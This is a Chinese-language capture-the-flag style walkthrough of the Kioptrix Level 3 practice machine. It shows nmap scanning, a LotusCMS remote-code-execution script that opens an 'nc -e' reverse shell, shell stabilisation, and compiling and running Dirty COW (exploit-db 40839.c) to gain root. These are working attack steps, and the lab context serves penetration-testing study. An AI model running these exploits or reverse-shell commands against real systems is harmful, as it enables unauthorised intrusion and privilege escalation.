打靶日记Kioptix Level 3(脏牛提权)

一、探测靶机IP(进行信息收集)

ifconfig

ifconfig 查看自己网段,kali和靶机的网段一样
在这里插入图片描述

nmap -p- 192.168.253.0/24 

在这里插入图片描述

二、进入网页

在浏览器输入靶机ip即可
在这里插入图片描述

发现这里有个login登录,还有一个LotusCMS,看看有没有历史漏洞

三、利用工具searchsploit 查找相关漏洞与exp

在这里插入图片描述

因为oscp考试只能使用一次msf,所以不使用
在这里插入图片描述

searchsploit -m 16982

Multiple Vulnerabilities的意思为多个漏洞,没什么用,反弹不了shell

四、反弹shell

去github上搜搜https://github.com/Hood3dRob1n/LotusCMS-Exploit
甚至有个视频教,视频很详细,直接克隆,要是访问不上就直接在主机下好拖进去

git clone https://github.com/Hood3dRob1n/LotusCMS-Exploit.git

在这里插入图片描述

直接执行
在这里插入图片描述

./lotusRCE.sh

执行后可以看到示例,exp使用方法:./lotusRCE.sh ip,这里ip写靶机的ip
在这里插入图片描述

在kali开一个终端作为shell的接收端,并在exp里输入kali的ip和监听的端口,然后选择第一个“nc -e”
在这里插入图片描述
在这里插入图片描述

稳定shell界面

python -c "import pty; pty.spawn('/bin/bash');"

在这里插入图片描述

五、下载exp提权

然后再查看版本号搜集信息

uname -a 
lsb_release -a

在这里插入图片描述

这里再去搜集一下

searchsploit linux 2.6.24 Privilege

发现只有这三个符合
在这里插入图片描述

先尝试40616.c
在这里插入图片描述

searchsploit -m 40616.c
gcc -o exp 40616.c

在这里插入图片描述

发现报错,若编译exp中出现如下-W开头的报错,可以添加-Wno参数继续编译,虽然会生成一个exp文件,但最后还是有问题

gcc -o exp 40616.c -Wno-implicit-function-declaration

搭建一个简单的 HTTP 文件服务器,默认将当前工作目录作为文件服务器的根目录,允许其他设备通过网络访问该目录下的文件

python -m http.server

在这里插入图片描述

进入tmp目录

cd /tmp
./exp

说没有权限,后面发现只有下载在靶机里编译好之后才有执行权限,编译好的再下载进去是没有的,这个40616.c并不能提权,之后就尝试40839.c
在这里插入图片描述

只有下载到靶机里面去了,在靶机编译才有执行权限,在这个目录chmod命令没用
在这里插入图片描述

发现报错,尝试40839.c

searchsploit -m 40839.c

将40839.c编译,发现报错,上面的40616.c还是可以编译成的,这个直接不能编译,cat进去看看
发现有使用方法,将dirty.c替换成40839.c就ok了
[图片]

gcc -pthread 40839.c -o dirty -lcrypt

在这里插入图片描述

可以看到编译好了,直接执行./dirty,输入新密码
在这里插入图片描述

然后重新连一下
在这里插入图片描述

可以看到提权成功,firefart用户已经是root组的用户

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值